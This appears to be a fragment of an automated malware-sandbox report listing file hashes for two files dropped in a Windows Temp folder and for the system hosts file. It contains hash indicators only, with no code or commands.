SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Temp\L6HSkvzV9EuOcLa

MD5 5be7f6f434724dfcc01e8b2b0e753bbe
SHA1 ef1078290de6b5700ff6e804a79beba16c99ba3e
SHA256 4064b300ca1a67a3086e1adb18001c0017384b8f84ff4c0e693858889cef2196
SHA512 3b470c3ad5be3dd7721548021a818034584bbd88237b1710ce52ac67e04126fff4592c02f5868ebda72f662ec8c5f7fc4d0a458f49fe5eb47e024a5c50935ee2

C:\Users\Admin\AppData\Local\Temp\9TWFtBIRikDbptU\Display\Display.png

MD5 64def942ce1acc25e7671dff14576e8b
SHA1 ae5e42c60d97699d83471cba31e107b2fac34aa8
SHA256 bf75c45427704104f5934df15f523a56280a98be898d9f95f3fa4423e9313b0a
SHA512 842250c71104f553b3816874f30050fd2419520fb18e979193e2382a6a8ff0bd3f7d24590bf0cf313dd391c330b065dfd96b34564061db14d6129d55a6472dd0

C:\Windows\System32\drivers\etc\hosts

MD5 4028457913f9d08b06137643fe3e01bc
SHA1 a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512 c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b